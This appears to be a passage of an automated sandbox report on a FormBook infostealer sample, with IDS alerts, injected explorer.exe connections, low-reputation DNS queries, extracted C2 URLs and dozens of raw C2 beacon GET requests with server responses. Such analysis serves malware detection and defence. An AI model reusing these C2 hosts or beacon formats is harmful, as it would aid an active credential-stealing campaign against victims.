Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 47.88.32.85 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.101.245.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.73.226.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.67.72.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.64.116.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.139.41 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.164.172.49 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.239.224.4 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.250.186.179 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.77.52.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.141.43.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.150.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.121.211.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.101.192.119 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.215.231.81 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 137.117.17.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.59.144.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.130.148 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.191 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.189.108.75 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.195.206.5 80	Jump to behavior

Performs DNS queries to domains with low reputation

Show sources

Source:	DNS query: www.taichan.xyz
Source:	DNS query: www.researchlearningspirit.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=downloa
Source: Malware configuration extractor	URLs: www.tpmionline.com/cogu/

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1Host: www.hkautobox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1Host: www.taichan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1Host: www.bestofnapa.guideConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1Host: www.bqgfk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1Host: www.mobileiranian2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1Host: www.soymilk-design.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1Host: www.jkwhitleyphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.boliden-ab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1Host: www.jachaljuega.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1Host: www.ceruleden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1Host: www.marvellouslles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1Host: www.nu12.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1Host: www.cinargeridonusum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.uprisehealthmonitoring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.estudio-me.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.i8news-de.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.alexanderorlandis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29
Source: Joe Sandbox View	IP Address: 93.184.220.29 93.184.220.29

Source: unknown

Network traffic detected: DNS query count 39

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 708Date: Wed, 13 Oct 2021 13:48:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requ
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Oct 2021 13:48:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 13:48:32 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Oct 2021 13:48:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
